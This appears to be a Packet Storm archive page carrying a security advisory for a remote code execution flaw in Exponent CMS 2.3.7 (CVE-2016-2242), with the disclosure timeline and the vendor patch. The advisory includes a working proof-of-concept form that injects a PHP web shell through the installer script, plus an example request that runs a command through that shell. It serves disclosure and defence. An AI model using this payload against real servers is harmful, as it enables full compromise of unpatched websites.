exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Exponent 2.3.7 PHP Code Execution

Exponent 2.3.7 PHP Code Execution
Posted Feb 11, 2016
Authored by High-Tech Bridge SA | Site htbridge.com

Exponent version 2.3.7 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2016-2242
SHA-256 | c860521e13cb68a7d5e2065b83c714419c3402786742f17f19e96a31700e22cc

Exponent 2.3.7 PHP Code Execution

Change Mirror Download
Advisory ID: HTB23290
Product: Exponent
Vendor: http://www.exponentcms.org/
Vulnerable Version(s): 2.3.7 and probably prior
Tested Version: 2.3.7
Advisory Publication: January 13, 2016 [without technical details]
Vendor Notification: January 13, 2016
Vendor Patch: January 23, 2016
Public Disclosure: February 3, 2016
Vulnerability Type: Code Injection [CWE-94]
CVE Reference: CVE-2016-2242
Risk Level: Critical
CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered critical vulnerability in Exponent CMS, which can be exploited to inject and execute arbitrary PHP code on the vulnerable system with the privileges of the web server.

The vulnerability resides within "/install/index.php" script, when handling user-input data passed via "sc" HTTP POST parameter. The script is not deleted by default after installation of the web application. A remote unauthenticated attacker can permanently inject arbitrary PHP code into "/framework/conf/config.php" configuration file and execute it with privileges of the web server.

The attacker will be able to run arbitrary system commands, gain complete control over the vulnerable website, its databases and even compromise the entire web server.

A simple exploit below will modify "/framework/conf/config.php" file and inject simple web shell into it:


<form action="http://[host]/install/index.php" method="post" name="main">
<input type="hidden" name='sc[",""); passthru($_GET[]' value='"]); // '>
<input value="submit" id="btn" type="submit" />
</form>


After successful PHP code injection, the attacker can execute arbitrary system command viathe web shell.

The following example will display output of "/bin/ls" command for the current directory:

http://[host]/index.php?,%27=ls

-----------------------------------------------------------------------------------------------

Solution:

Apply Patch #3 to Exponent CMS v2.3.7

More Information:
https://exponentcms.lighthouseapp.com/projects/61783-exponent-cms/tickets/1345-exponent-security-vulnerability-notification
http://www.exponentcms.org/news/security-notice-closing-an-exponent-security-vulnerability
http://www.exponentcms.org/news/patch-3-released-for-v2-3-7

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23290 - https://www.htbridge.com/advisory/HTB23290 - Remote Code Execution in Exponent
[2] Exponent - http://www.exponentcms.org/ - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close